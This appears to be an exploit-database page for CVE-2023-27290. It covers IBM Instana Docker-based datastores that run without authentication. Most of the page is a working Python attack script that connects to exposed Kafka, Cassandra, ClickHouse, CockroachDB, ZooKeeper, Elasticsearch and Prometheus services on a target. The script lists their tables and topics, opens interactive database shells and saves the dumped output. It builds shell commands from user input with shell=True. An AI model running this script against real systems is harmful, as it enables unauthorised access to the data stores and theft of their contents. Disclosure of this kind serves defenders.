Docker based datastores for ibm instana 2412 2430 no authentication Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-07 | Type : remote | Platform : multiple


[+] Code ...

# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect

# Define the available options and their corresponding commands
COMMANDS = {
"kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
"cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
"clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
"cockroach": "cockroach sql --host {host}:{port} --insecure",
"zookeeper": "echo dump |ncat {host} {port}",
"node-export": "curl http://{host}:{port}",
"elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
"prometheus": "curl http://{host}:{port}/metrics",
"clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}

# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")

# Parse the command-line arguments
args = parser.parse_args()

# Determine the port number to use
if args.port is None:
if args.option == "cassandra":
port = "9042"
elif args.option == "clickhouse":
port = "8123"
elif args.option == "cockroach":
port = "26257"
elif args.option == "elasticsearch":
port = "9200"
elif args.option == "kafka":
port = "9092"
elif args.option == "node-export":
port = "8181"
elif args.option == "prometheus":
port = "9090"
elif args.option == "zookeeper":
port = "2181"
else:
port = str(args.port)

# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)

# Print the command line if verbose option is provided
if args.verbose:
print(f"Executing command: {command}")

# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
child = pexpect.spawn(command)
child.expect("Connected to.*", timeout=10)
child.interact()
output = child.before
elif args.option == "cockroach":
child = pexpect.spawn(command)
child.expect("root@.*:", timeout=10)
child.interact()
output = child.before
# If any other option is selected, execute the command and capture the output
else:
output = subprocess.check_output(command, shell=True)

# If an output file is provided, write the output to the file
if args.output:
with open(args.output, "wb") as f:
f.write(output)

# Print the output to the console
print(output.decode())